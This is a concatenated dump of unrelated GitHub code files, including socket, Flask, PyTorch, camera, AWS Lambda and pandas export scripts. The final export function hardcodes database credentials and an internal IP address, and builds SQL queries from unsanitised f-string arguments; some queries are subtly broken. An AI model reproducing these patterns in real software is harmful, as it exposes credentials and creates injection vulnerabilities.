model.predict_classes(imgs.reshape(1,32,32,3),batch_size=128,verbose=1)\nmodel.predict_proba(imgs.reshape(1,32,32,3),batch_size=10,verbose=1)\n","repo_name":"KatameRonin/ComputerVision","sub_path":"ImageClassification/CIFAR10/Img_cifar10.py","file_name":"Img_cifar10.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71323445606","text":"import pygame\n\nGROUND = \"\"\"\n #####\n # 2 #\n # #\n # 1 #\n #####\n\"\"\"\n# SETTING\nLOOP_SPEED = 0.01\nMAX_DELAY = 2\nMID_DELAY = 1\nMAX_TIMER = 200\nREPEAT_NB = 100\nLOAD_QTABLE = False\n\n# POSITION\nPLAYER_ONE_POSITION = '1'\nPLAYER_TWO_POSITION = '2'\nWALL = '#'\n\n# REWARDS\nREWARD_WIN = 100\nREWARD_LOSE = -100\nREWARD_BORDER = -10\nREWARD_NOTHING = -20\n\nREWARD_GET_HIT = -15\nREWARD_DIRECT_HIT = 10\n\nREWARD_INTERRUPT = 20\nREWARD_GET_INTERRUPT = -10\n\nREWARD_GET_HEAVY_HIT = -35\nREWARD_DIRECT_HEAVY_HIT = 30\n\nREWARD_BLOCKED_HIT = 10\nREWARD_GET_BREAK = -20\nREWARD_BREAK_BLOCK = 20\n\nRUN_IN_OPPONENT = -15\nREWARD_MOVE = -1\n\nREWARD_MISS = -40\nREWARD_HIT_IN_BLOCK = -10\n\n\n#ACTIONS\nLEFT = 'LEFT'\nRIGHT = 'RIGHT'\nUP = 'UP'\nDOWN = 'DOWN'\nATT_LEFT = 'ATT_LEFT'\nATT_RIGHT = 'ATT_RIGHT'\nHEAVY_ATT_LEFT = 'H_ATT_LEFT'\nHEAVY_ATT_RIGHT = 'H_ATT_RIGHT'\nBLOCK_LEFT = 'BLOCK_LEFT'\nBLOCK_RIGHT = 'BLOCK_RIGHT'\nNOTHING = 'NOTHING'\n\nACTIONS = [\n LEFT,\n RIGHT,\n UP,\n DOWN,\n NOTHING,\n ATT_RIGHT,\n ATT_LEFT,\n HEAVY_ATT_LEFT,\n HEAVY_ATT_RIGHT,\n BLOCK_LEFT,\n BLOCK_RIGHT\n]\n\n# STATS\nSTARTING_LIFE_POINT = 100\n\n#DAMAGE\nHIT_DMG = 5\nHEAVY_HIT_DMG = 10\nHEAVY_HIT_ON_BLOCK_DMG = 7\n\n","repo_name":"barder60/reinforcementFightingGame","sub_path":"constant.py","file_name":"constant.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17542881931","text":"#! 
-*- encoding=utf-8 -*-\nimport socket\nimport threading\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver.bind(('0.0.0.0', 8000)) # takes a tuple!!!!! (address, port)\nserver.listen()\n\ndef handle_sock(sock, addr):\n    while True:\n        data = sock.recv(1024)\n        data_value = data.decode(\"utf8\")\n        if data_value == \"exit\":\n            break\n        print(data.decode(\"utf8\"))\n        re_data = input()\n        sock.send(re_data.encode(\"utf8\"))\n    sock.close()\n    \n# receive the data sent from the client\n# read up to 1K of data at a time\nwhile True:\n    sock, addr = server.accept()\n    # handle the newly accepted connection (user) in a thread\n    client_thread = threading.Thread(target=handle_sock, args=(sock, addr)) # pass the function itself, never a function call!\n    client_thread.start()\n    data = sock.recv(1024)\n    print(data.decode(\"utf8\"))\n    re_data = input()\n    sock.send(re_data.encode(\"utf8\"))\n\n# data = sock.recv(1024) # the unit is bytes; data is a bytes object\n# print(data.decode(\"utf8\"))\n# sock.send(\"hello {}\".format(data.decode(\"utf8\")).encode(\"utf8\"))\n'''\nAF_INET: AddressFamily IPv4\nAF_INET6: AddressFamily IPv6\nSOCK_STREAM: SocketKind TCP\nSOCK_DGRAM: SocketKind UDP\n'''\n# server.close()\n# sock.close()","repo_name":"wnz27/Coding-Daily","sub_path":"content/Python_Generate/Python_socket编程/socket_server.py","file_name":"socket_server.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"15338155238","text":"#!/usr/bin/env python\n#\n# COMMON CLASS FOR SIGN REQUEST\n#\n\n\nfrom flask import Flask\nfrom flask_restful import Api, Resource, reqparse\nfrom flask import send_file\nfrom flask import render_template\nfrom flask import request, abort, jsonify, send_from_directory\nfrom server.app import app\n\nfrom server.app import getRootInputDir\nfrom server.app import getRootOutputDir\nfrom server.app import getRootDownloadDir\nfrom server.app import KEEP_OUTPUT_FILE\nfrom server.fota.fotagenresp import FotaGenResp\nimport os\nfrom server import applog as applog \nfrom server.applog import log\nfrom server.applog import logD\nfrom server.applog import logE\nimport shutil\nfrom server import common as common\nimport traceback\n# import fota\nimport server.login\n\nfrom server.common import DEFAULT_KEY_ID\nfrom server.common import INVALID_KEY_ID\n\nfrom server.storage import storageMgr\nfrom server import database as database\nfrom server.key.key_mng import keyMgr\nfrom server.app import DEBUG\nTAG = \"fota\"\n\n# Common fota request\nclass FotaGenReq(object):\n    access_token = \"\" # for log in feature\n    model = \"\"\n    project = \"\"\n    zip_output = False # if output is zip file, instead of redirecting to download page\n\n    in_working_folder = \"\" # caller's input data\n    out_working_folder = \"\" # output data when doing signing\n    tool_working_folder = \"\" # path to tool folder\n    key_working_folder = \"\" # path to key dir\n\n    file_list = {} # list of input file, dict of name () and full path\n    file_path_list = {} # list of input file, dict of name () and full path\n    ver_list = {} # version of each module\n    zip_list = {} # file of each module is zip or not\n    session = None # fota session\n    key_type = None # TODO: change to use key_id, for user to select key for fota\n    is_api = False # Is called via API\n    key_id = INVALID_KEY_ID\n    key_info = None\n    def __init__(self, __request):\n        # Parse request info\n        self.key_type = request.form.get(common.PARAM_KEY_TYPE)\n        self.project = request.form.get(common.PARAM_PROJECT)\n        self.model = request.form.get(common.PARAM_MODEL)\n        self.access_token = request.form.get(common.PARAM_ACCESS_TOKEN)\n        
\n # apis\n if common.PARAM_API in request.form:\n self.is_api = request.form.get(common.PARAM_API)\n\n # zip output\n zip = request.form.get(common.PARAM_ZIP_OUTPUT)\n\n self.zip_output = common.isZip(zip)\n\n if (DEBUG): logD(\"zip_output %s\" %(self.zip_output))\n\n # generate session\n # TODO: generate here, but push other place, so risk of duplicateion session id\n # Re-use Session Management of Sign module\n from server.sign import signfactory\n self.session = signfactory.SignFactory.getSession() # WARNING: just create session, not manage by session management yet\n\n\n # check if key id is specified\n if common.PARAM_KEY_ID in request.form:\n self.key_id = request.form.get(common.PARAM_KEY_ID)\n else:\n key_name = common.extract_form_request(request, common.PARAM_KEY_NAME)\n if key_name is not None and len(key_name) > 0: #if key name, need to match with project and model\n if key_name == common.DEFAULT_KEY_ID:\n self.key_id = key_name\n else:\n self.key_info = keyMgr().get_key_by_name(key_name, project=self.project, model=self.model)\n if (self.key_info is not None):\n self.key_id = self.key_info.id\n else:\n self.key_id = INVALID_KEY_ID\n else:\n self.key_id = DEFAULT_KEY_ID\n\n # TODO: search default key in db\n if self.key_id == DEFAULT_KEY_ID:\n self.key_info = keyMgr().get_default_key(self.project, self.model, \"fota\", \"fota\")\n if self.key_info is None:\n log(\"Not found default key, use default in tool if exists\")\n\n # make working folder for request\n import server.fota\n # input folder (i.e. uploaded file)\n self.in_working_folder = os.path.join(getRootInputDir(), self.session.uuid)\n # output folder\n self.out_working_folder = os.path.join(getRootOutputDir(), self.session.uuid)\n self.tool_working_folder = \"\"\n\n # save upload file to input fulder\n for key in request.files.keys():\n # key is module name\n\n # get list of file\n files = request.files.getlist(key)\n if (DEBUG): logD(\"file: %s has %s file\" %(key, len(files)))\n self.file_list[key] = None\n for file in files:\n # check if file info is valid\n # if not file is selected to upload, files still not null, but its info is null\n if file is not None and file.filename is not None and len(file.filename) > 0:\n if (files is not None and len(files) > 0):\n self.file_list[key] = files # list of files of module (key)\n break\n # get version of modules\n # TODO: check version\n version = request.form[\"ver_%s\" % key]\n if (version is not None):\n self.ver_list[key] = version.strip()\n else:\n self.ver_list[key] = None\n\n # upload file is zip one or not\n # TODO: handle case multiple zip file is uploaded\n zip_name = \"zip_%s\" % key\n if zip_name in request.form:\n zipbin = request.form.get(zip_name)\n else:\n zipbin = False\n \n # TODO: just initialize handling, do handle it\n # TODO: handle the case that zip is selected, but it's not zip\n if (zipbin is not None):\n if (DEBUG): logD(\"%s zip %s\" %(key, zipbin))\n self.zip_list[key] = True if zipbin == 'on' else False\n else:\n self.zip_list[key] = False\n\n def toString(self, isFull=False):\n str = \"\"\n \n if (self.session is not None):\n str += \"session: %s, \" % self.session.toString()\n if (isFull):\n if (self.model is not None):\n str += \"model: %s, \" % self.model\n if (self.access_token is not None):\n str += \"access_token: %s, \" % self.access_token\n if (self.in_working_folder is not None):\n str += \"in_working_folder: %s, \" % self.in_working_folder\n if (self.out_working_folder is not None):\n str += \"out_working_folder: %s, \" % 
self.out_working_folder\n if (self.ver_list is not None):\n str += \"ver_list: %s, \" % self.ver_list\n\n str += \"\\n\"\n return str\n\n # clean up fota request data\n def clean(self):\n if (DEBUG): logD(\"SignRequest: remove in_working_folder %s\" % self.in_working_folder)\n common.rmdirs(self.in_working_folder)\n if (DEBUG): logD(\"SignRequest: remove out_working_folder %s\" % self.out_working_folder)\n common.rmdirs(self.out_working_folder)\n #download folder will be clean in SignResp\n","repo_name":"dutroctu/sign_server","sub_path":"server/fota/fotagenreq.py","file_name":"fotagenreq.py","file_ext":"py","file_size_in_byte":7192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2631598787","text":"#write a python script to concatenate following dictionaries to create a new one\n\nprint(\"****************************************************\")\nprint(\"Program to concatenate given dictionaries in new one\")\nprint(\"****************************************************\\n\")\n\nd1 = dict() #empty list\nnum = int(input(\"How many key-value pairs do you wish to enter for season-1: \"))\n\n#loop\nfor i in range(num):\n data = input(\"Enter player name and goals seperated by ':' - \")\n tempInput = data.split(':')\n d1[tempInput[0]] = int(tempInput[1])\n\nd2 = dict() #empty list\nnum2 = int(input(\"\\nHow many key-value pairs do you wish to enter for season-2: \"))\n\n#loop\nfor j in range(num2):\n data2 = input(\"Enter player name and goals seperated by ':' - \")\n tempInput2 = data2.split(':')\n d2[tempInput2[0]] = int(tempInput2[1])\n\n#concatenation\nprint(\"\\nSeason-1 Scores :\", d1)\nprint(\"\\nSeason-2 Scores :\", d2)\n\ntempDict = d1.copy()\ntempDict.update(d2)\n\nprint(\"\\nAll scores :\", tempDict)","repo_name":"soulspy23/CLASSROOM_1","sub_path":"SEM 3/PRACTICALS/p5/p5_b.py","file_name":"p5_b.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"74812331356","text":"import numpy as np\r\nimport cv2\r\n\r\nimg = cv2.imread('lena.bmp', cv2.IMREAD_GRAYSCALE)\r\nimg_height = img.shape[0]\r\nimg_width = img.shape[1]\r\n\r\ntiny_img_height = int(img_height/8)\r\ntiny_img_width = int(img_width/8)\r\ntiny_binimg = np.zeros((tiny_img_height, tiny_img_width), dtype = np.uint8)\r\n\r\nfor i in range(tiny_img_height):\r\n for j in range(tiny_img_width):\r\n if (img[8*i, 8*j] < 128):\r\n tiny_binimg[i, j] = 0\r\n else:\r\n tiny_binimg[i, j] = 255\r\n\r\nresult = np.zeros((tiny_img_height, tiny_img_width), dtype=np.uint8)\r\n\r\ndef h(a1, a2, a3, a4):\r\n if a1 != a2:\r\n return 's'\r\n elif a1 == a3 == a4:\r\n return 'r'\r\n else: \r\n return 'q'\r\n\r\ndef f(h1, h2, h3, h4):\r\n if (h1 == h2 == h3 == h4 == 'r'):\r\n return 5\r\n else:\r\n return ((h1 == 'q') + (h2 == 'q') + (h3 == 'q') + (h4 == 'q'))\r\n\r\n######################\r\n# x[7] # x[2] # x[6] #\r\n# x[3] # x[0] # x[1] #\r\n# x[8] # x[4] # x[5] #\r\n######################\r\n\r\nfor i in range(tiny_img_height):\r\n for j in range(tiny_img_width):\r\n x = np.zeros((9), dtype = np.uint8)\r\n x[0] = tiny_binimg[i, j]\r\n if (j+1 >= tiny_img_width):\r\n x[1] = 0\r\n else:\r\n x[1] = tiny_binimg[i, j+1]\r\n if (i-1 < 0):\r\n x[2] = 0\r\n else:\r\n x[2] = tiny_binimg[i-1, j]\r\n if (j-1 < 0):\r\n x[3] = 0\r\n else:\r\n x[3] = tiny_binimg[i, j-1]\r\n if (i+1 >= tiny_img_height):\r\n x[4] = 0\r\n else:\r\n x[4] = tiny_binimg[i+1, j]\r\n if (i+1 >= tiny_img_height or j+1 >= 
tiny_img_width):\r\n x[5] = 0\r\n else:\r\n x[5] = tiny_binimg[i+1, j+1]\r\n if (i-1 < 0 or j+1 >= tiny_img_width):\r\n x[6] = 0\r\n else:\r\n x[6] = tiny_binimg[i-1, j+1]\r\n if (i-1 < 0 or j-1 < 0):\r\n x[7] = 0\r\n else:\r\n x[7] = tiny_binimg[i-1, j-1]\r\n if (i+1 >= tiny_img_height or j-1 < 0):\r\n x[8] = 0\r\n else:\r\n x[8] = tiny_binimg[i+1, j-1]\r\n if (tiny_binimg[i, j] == 0):\r\n result[i, j] = 0\r\n else:\r\n result[i,j] = f(h(x[0], x[1], x[6], x[2]), \\\r\n h(x[0], x[2], x[7], x[3]), \\\r\n h(x[0], x[3], x[8], x[4]), \\\r\n h(x[0], x[4], x[5], x[1]))\r\n\r\noutput_log = open(\"lena_yokoi.txt\", 'w')\r\nfor i in range(tiny_img_height):\r\n for j in range(tiny_img_width):\r\n if (result[i, j] == 0):\r\n print(\" \", end = \" \", file = output_log)\r\n else:\r\n print(result[i, j], end = \" \", file = output_log)\r\n print(file = output_log)","repo_name":"neil1373/CV2019","sub_path":"hw6/hw6.py","file_name":"hw6.py","file_ext":"py","file_size_in_byte":2702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"25745533996","text":"from enum import Enum\nimport os\n\nDATASETS = {\n 'e_coli': os.path.abspath('inputs/E_coli_genome.txt'),\n 'salmonella': os.path.abspath('inputs/Salmonella_enterica.txt'),\n 'cholera': os.path.abspath('inputs/Vibrio_Cholera_Genome.txt'),\n 'tb_dosr': os.path.abspath('inputs/DosR.txt'),\n}\nDATASET_KEYS = list(DATASETS.keys())\n\nBASES = ['A','C','G','T']\nBASES_COMPLEMENTS = {'A': 'T', 'T': 'A', 'C': 'G', 'G': 'C'}\n\nclass Plots(Enum):\n COUNTS_RAW = 'Counts'\n COUNTS_PCT = 'Counts (%)'\n COUNTS_PCT_BASE = 'Counts Centered (%)'\n COUNTS_PCT_DIFF = 'Counts Diff(%)'\n SKEW = 'Skew'\n TEST = 'Test'\n NETWORK = 'Network'\n\nENABLED_PLOTS = [Plots.COUNTS_PCT_BASE, Plots.COUNTS_PCT_DIFF, Plots.SKEW, Plots.NETWORK]\n\ndef dataset(key):\n if key not in DATASET_KEYS:\n raise Exception(f\"invalid key {key}\")\n if key == 'tb_dosr':\n with open(DATASETS[key]) as f: return [l.strip() for l in f.readlines()]\n with open(DATASETS[key]) as f: return f.read().strip().replace('\\n','')","repo_name":"ankitson/compbio","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"73456503836","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass TwoLayerCNN(nn.Module): # for Rotate MNIST, follows the PyTorch example on MNIST\n def __init__(self):\n super(TwoLayerCNN, self).__init__()\n self.conv1 = nn.Conv2d(1, 32, 3, 1)\n self.bn1 = nn.BatchNorm2d(32)\n self.conv2 = nn.Conv2d(32, 64, 3, 1)\n self.bn2 = nn.BatchNorm2d(64)\n self.dropout1 = nn.Dropout(0.25)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.bn1(x)\n x = F.relu(x)\n x = self.conv2(x)\n x = self.bn2(x)\n x = F.relu(x)\n x = F.max_pool2d(x, 2)\n x = self.dropout1(x)\n x = torch.flatten(x, 1)\n\n return x\n\n\nclass ThreeLayerCNN(nn.Module): # for portraits\n def __init__(self):\n super(ThreeLayerCNN, self).__init__()\n self.conv1 = nn.Conv2d(1, 32, 3, 1)\n self.bn1 = nn.BatchNorm2d(32)\n self.conv2 = nn.Conv2d(32, 64, 3, 1)\n self.bn2 = nn.BatchNorm2d(64)\n self.conv3 = nn.Conv2d(64, 128, 3, 1)\n self.bn3 = nn.BatchNorm2d(128)\n self.dropout1 = nn.Dropout(0.5)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.bn1(x)\n x = F.relu(x)\n x = F.max_pool2d(x, 2)\n x = self.conv2(x)\n x = self.bn2(x)\n x = F.relu(x)\n x = F.max_pool2d(x, 2)\n x = self.conv3(x)\n x = 
self.bn3(x)\n x = F.relu(x)\n x = F.max_pool2d(x, 4)\n x = self.dropout1(x)\n x = torch.flatten(x, 1)\n\n return x\n\nclass OneLayerMLPEnc(nn.Module):\n def __init__(self, input_dim, output_dim, dropout_p=0.25):\n super(OneLayerMLPEnc, self).__init__()\n self.fc = nn.Linear(input_dim, output_dim)\n self.bn1 = nn.BatchNorm1d(output_dim)\n self.dropout = nn.Dropout(dropout_p)\n\n def forward(self, x):\n x = self.fc(x)\n x = self.bn1(x)\n x = self.dropout(x)\n return x","repo_name":"hsinghuan/gde","sub_path":"model/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"14269515140","text":"\"\"\"\n\tPixelFormat: Set output pixel format to Mono8.\n\n\"\"\"\n\nimport stapipy as st\n\nnumber_of_images_to_grab = 100\n\ntry:\n st.initialize()\n\n st_system = st.create_system()\n\n st_device = st_system.create_first_device()\n\n print('Device=', st_device.info.display_name)\n\n # ============================================================\n # Demostration of PixelFormat change.\n\n # Acquire NodeMap for accessing camera parameter\n nodemap_remote = st_device.remote_port.nodemap\n\n # Set Pixel Format to Mono8.\n pixel_format = nodemap_remote.get_node(\"PixelFormat\")\n enum_pixel_format = st.PyIEnumeration(pixel_format)\n enum_pixel_format.from_string(\"Mono8\")\n \n # ============================================================\n\n st_datastream = st_device.create_datastream()\n\n st_datastream.start_acquisition(number_of_images_to_grab)\n\n st_device.acquisition_start()\n\n while st_datastream.is_grabbing:\n with st_datastream.retrieve_buffer() as st_buffer:\n if st_buffer.info.is_image_present:\n st_image = st_buffer.get_image()\n print(\"BlockID={0} Size={1} x {2} First Byte={3}\".format(\n st_buffer.info.frame_id,\n st_image.width, st_image.height,\n st_image.get_image_data()[0]))\n else:\n print(\"Image data does not exist.\")\n\n st_device.acquisition_stop()\n\n st_datastream.stop_acquisition()\n\nexcept Exception as exception:\n print(exception)\n","repo_name":"Setsu00/SentechSDK_FunctionSample","sub_path":"Python/Parameter_PixelFormat/grab_Parameter_PixelFormat.py","file_name":"grab_Parameter_PixelFormat.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"15504510320","text":"import sys\nsys.path.append('../../')\nsys.path.append('../../layer')\n\nimport os\nimport json\nimport unittest\nfrom unittest import mock\n\n# wip\n# No such file or directory: 'template.html'\n\nwith mock.patch.dict('os.environ', {'AWS_REGION': 'us-east-1', 'TABLE_NAME': 'mock-table', 'ANNOUNCEMENTS_BUCKET': 'mock-bucket', 'CONTACT_TABLE_NAME': 'mock-contact-table'}):\n from send_daily_email.app import lambda_handler\n\ndef mocked_get_announcement():\n return None\n\ndef mocked_store_words(word_list):\n return\n\ndef mocked_send_email(campaign_contents, email):\n\n ses_success_response = {\n \"MessageId\":\"010001731670746b-123456-6e8c-4bd0-bf32-4238ba0e5921-000000\",\n \"ResponseMetadata\":{\n \"RequestId\":\"ab476c36-de5a-123a-a90e-6be7b103b68f\",\n \"HTTPStatusCode\":200,\n \"HTTPHeaders\":{\n \"x-amzn-requestid\":\"ab476c36-de5a-123a-a90e-6be7b103b68f\",\n \"content-type\":\"text/xml\",\n \"content-length\":\"326\",\n \"date\":\"Fri, 03 Jul 2020 20:48:54 GMT\"\n },\n \"RetryAttempts\":0\n }\n }\n\n return ses_success_response\n\ndef mocked_scan_contacts():\n\n all_contacts = 
[\n {'Date': '2020-01-13', 'CharacterSet': 'simplified', 'Status': 'subscribed', 'SubscriberEmail': 'user@example.com', 'ListId': '1'},\n {'Date': '2020-01-13', 'CharacterSet': 'simplified', 'Status': 'unsubscribed', 'SubscriberEmail': 'user@example.com', 'ListId': '6'},\n {'Date': '2020-01-13', 'CharacterSet': 'traditional', 'Status': 'subscribed', 'SubscriberEmail': 'user@example.com', 'ListId': '4'},\n {'Date': '2020-01-13', 'CharacterSet': 'traditional', 'Status': 'unsubscribed', 'SubscriberEmail': 'user@example.com', 'ListId': '3'}\n ]\n\n return all_contacts\n\ndef mocked_get_random(hsk_level):\n \n hsk_level_index = int(hsk_level) - 1\n\n local_vocab_lists = [\n {\n \"Word\": \"怎么样\",\n \"Pronunciation\": \"zěn me yàng\",\n \"Definition\": \"how?; how about?; how was it?; how are things?\",\n \"HSK Level\": \"1\",\n \"Word-Traditional\": \"怎麼樣\"\n },\n {\n \"Word\": \"回答\",\n \"Pronunciation\": \"huí dá\",\n \"Definition\": \"to reply; to answer; the answer; CL:個|个[ge4]\",\n \"HSK Level\": \"2\",\n \"Word-Traditional\": \"回答\"\n },\n {\n \"Word\": \"腿\",\n \"Pronunciation\": \"tuǐ\",\n \"Definition\": \"leg; CL:條|条[tiao2]\",\n \"HSK Level\": \"3\",\n \"Word-Traditional\": \"腿\"\n },\n {\n \"Word\": \"乱\",\n \"Pronunciation\": \"luàn\",\n \"Definition\": \"in confusion or disorder; in a confused state of mind; disorder; upheaval; riot; illicit sexual relations; to throw into disorder; to mix up; indiscriminate; random; arbitrary\",\n \"HSK Level\": \"4\",\n \"Word-Traditional\": \"亂\"\n },\n {\n \"Word\": \"叉子\",\n \"Pronunciation\": \"chā zi\",\n \"Definition\": \"fork; CL:把[ba3]\",\n \"HSK Level\": \"5\",\n \"Word-Traditional\": \"叉子\"\n },\n {\n \"Word\": \"注视\",\n \"Pronunciation\": \"zhù shì\",\n \"Definition\": \"to watch attentively; to gaze\",\n \"HSK Level\": \"6\",\n \"Word-Traditional\": \"注視\"\n }\n ]\n\n return local_vocab_lists[hsk_level_index]\n\nclass SendDailyEmailTest(unittest.TestCase):\n\n @mock.patch('send_daily_email.app.get_announcement', side_effect=mocked_get_announcement)\n @mock.patch('send_daily_email.app.scan_contacts_table', side_effect=mocked_scan_contacts)\n @mock.patch('send_daily_email.app.select_random_word', side_effect=mocked_get_random)\n @mock.patch('send_daily_email.app.send_email', side_effect=mocked_send_email)\n def test_build(self, send_email_mock, get_random_mock, scan_contacts_mock, get_announcement_mock):\n\n response = lambda_handler(self.scheduled_event(), \"\")\n\n self.assertEqual(get_announcement_mock.call_count, 1)\n self.assertEqual(scan_contacts_mock.call_count, 1)\n self.assertEqual(get_random_mock.call_count, 6)\n self.assertEqual(send_email_mock.call_count, 2)\n\n def scheduled_event(self):\n return {\n \"version\": \"0\",\n \"id\": \"d77bcbc4-0b2b-4d45-9694-b1df99175cfb\",\n \"detail-type\": \"Scheduled Event\",\n \"source\": \"aws.events\",\n \"account\": \"123456789\",\n \"time\": \"2016-09-25T04:55:26Z\",\n \"region\": \"us-east-1\",\n \"resources\": [\n \"arn:aws:events:us-east-1:123456789:rule/test-scheduled-event\"\n ],\n \"detail\": {}\n }\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"kbsujit/vocab","sub_path":"src/tests/unit/test_send_daily_email.py","file_name":"test_send_daily_email.py","file_ext":"py","file_size_in_byte":4477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"50"} +{"seq_id":"42931239100","text":"import logging\n\nimport lobby_service_common as service\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n\ndef lambda_handler(event, 
context):\n lobby_info = service.get_event_body(event)\n\n lobby_name = lobby_info[service.LOBBY_NAME]\n host_player = lobby_info[service.HOST_PLAYER]\n map_id = lobby_info[service.MAP_ID]\n num_players = lobby_info[service.NUM_PLAYERS]\n is_public = lobby_info[service.IS_PUBLIC]\n lobby_id = service.get_lobby_uuid()\n creation_time = service.get_unix_time()\n players = [host_player]\n map_name = service.get_map_name(map_id)\n\n logger.info(\"Received request to create Lobby: \" + lobby_id + \" - \" + lobby_name + \" by \" + str(host_player))\n\n lobby_item = {service.LOBBY_ID: lobby_id,\n service.LOBBY_NAME: lobby_name,\n service.MAP_ID: map_id,\n service.MAP_NAME: map_name,\n service.CREATION_TIME: creation_time,\n service.PLAYERS: players,\n service.NUM_PLAYERS: num_players,\n service.IS_PUBLIC: is_public,\n service.GAME_ID: service.GAME_ID_DEFAULT}\n\n service.create_lobby(lobby_item)\n\n return service.get_response(lobby_id)\n","repo_name":"Devin0xFFFFFF/singed-feathers","sub_path":"LobbyService/service/create_lobby.py","file_name":"create_lobby.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"50"} +{"seq_id":"72792439516","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\n\nimport pandas as pd\nimport io\nfrom xlsxwriter import Workbook\nfrom sqlalchemy import create_engine\nfrom datetime import datetime\n\n\n\n\nPOSTGRES_ADDRESS = '172.20.195.13' #'db.panoply.io' ## INSERT YOUR DB ADDRESS IF IT'S NOT ON PANOPLY\nPOSTGRES_PORT = '5432'\nPOSTGRES_USERNAME = 'tableau' #'username' ## CHANGE THIS TO YOUR PANOPLY/POSTGRES USERNAME\nPOSTGRES_PASSWORD = 'qwert123' #'***' ## CHANGE THIS TO YOUR PANOPLY/POSTGRES PASSWORD \nPOSTGRES_DBNAME = 'tollfreedb' # CHANGE THIS TO YOUR DATABASE NAME\n# A long string that contains the necessary Postgres login information\npostgres_str = ('postgresql://{username}:{password}@{ipaddress}:{port}/{dbname}'\n .format(username=POSTGRES_USERNAME,\n password=POSTGRES_PASSWORD,\n ipaddress=POSTGRES_ADDRESS,\n port=POSTGRES_PORT,\n dbname=POSTGRES_DBNAME))\n# Create the connection\ncnx = create_engine(postgres_str)\n\n\n\n\ndef exportdata(table_type, tollfree, startdate, enddate, username):\n queryEAS = f'''Select tollfree, \n state, \n area, \n complete,\n duration, \n 'cost',\n busy,\n no_answer,\n other,\n incomplete\n From callsummary as c \n where c.tollfree = {tollfree} and c.call_date >= {startdate} and c.call_date <= {enddate};\n '''\n \n output = io.BytesIO()\n \n ###################### EXCHANGE AREA SUMMARY-OVERALL ########################\n if table_type == 'EAS':\n df = pd.read_sql_query(queryEAS, cnx)\n dataEAS = df.groupby(['state','area']).agg(\n Complete_Calls = pd.NamedAgg(column='complete',aggfunc=sum),\n Total_Call_Duration = pd.NamedAgg(column='duration',aggfunc=sum),\n Total_Cost_of_Calls = pd.NamedAgg(column='cost',aggfunc=sum),\n Busy_Calls = pd.NamedAgg(column='busy',aggfunc=sum),\n No_Answer = pd.NamedAgg(column='no_answer',aggfunc=sum),\n Other = pd.NamedAgg(column='other',aggfunc=sum),\n Total_Incomplete = pd.NamedAgg(column='incomplete',aggfunc=sum),\n ).reset_index()\n\n dataEAS['%_Incomplete'] = (dataEAS['Total_Incomplete']/(dataEAS['Complete_Calls'] + dataEAS['Total_Incomplete']))* 100\n dataEAS['%_Incomplete'] = dataEAS['%_Incomplete'].round(2)\n\n dataEAS['Ave_Call_Length'] = dataEAS['Total_Call_Duration']/dataEAS['Complete_Calls']\n\n dataEAS['Average_Call_Length'] = pd.to_datetime(dataEAS['Ave_Call_Length'], unit='s')\n 
dataEAS['Average_Call_Length'] = dataEAS['Average_Call_Length'].dt.strftime('%H:%M:%S')\n        dataEAS['Call_Duration'] = pd.to_datetime(dataEAS['Total_Call_Duration'], unit='s')\n        dataEAS['Call_Duration'] = dataEAS['Call_Duration'].dt.strftime('%H:%M:%S')\n\n\n        data = dataEAS[['state','area','Complete_Calls','Call_Duration','Average_Call_Length',\n                'Total_Cost_of_Calls','Busy_Calls','No_Answer','Other','Total_Incomplete','%_Incomplete']]\n        \n        data.rename(columns={'state':'State', 'area':'Exchange Areas', 'Complete_Calls':'Calls', 'Call_Duration':'Duration', \n                'Average_Call_Length':'Avg Duration', 'Total_Cost_of_Calls':'Costs', 'Busy_Calls':'Busy', \n                'No_Answer':'No Answer', 'Total_Incomplete':'Incomplete','%_Incomplete':'Incomplete Percentage'},\n                inplace=True)\n\n    elif table_type == 'xxx':\n        pass\n    \n    \n    \n    options = {'default_date_format': 'dd/mm/yy', \n               'remove_timezone': True,\n               'in_memory': True} # set in_memory to True to avoid writing a temp file\n\n    \n    file = Workbook(output,options)\n    # text and formatting\n    bold_blue_16 = file.add_format({'bold':True, 'font_color':'blue','font_size':16}) # for color can also use rgb codes eg darkblue '#000066'\n    normal_bold = file.add_format({'bold':True})\n    normal_text = file.add_format({'bold':False})\n    coloured_cell_bold = file.add_format({'bold':True,'bg_color':'blue','font_color':'white','bottom':1})\n    blue_color = file.add_format({'bold':True,'bg_color':'#0072ce','font_color':'white'})\n    date_format = file.add_format({'num_format': 'dddd, mmmm dd, yyyy'})\n    \n    # create sheet\n    worksheet = file.add_worksheet() # can also specify name for sheet # Workbook.add_worksheet('Top 5 call')\n    # keep the info block near column G so a printout still fits on an A4 page\n    # all writing data operation is done on worksheet\n    # worksheet.merge_range(\n    #     'A1:C5',\n    #     'Merged 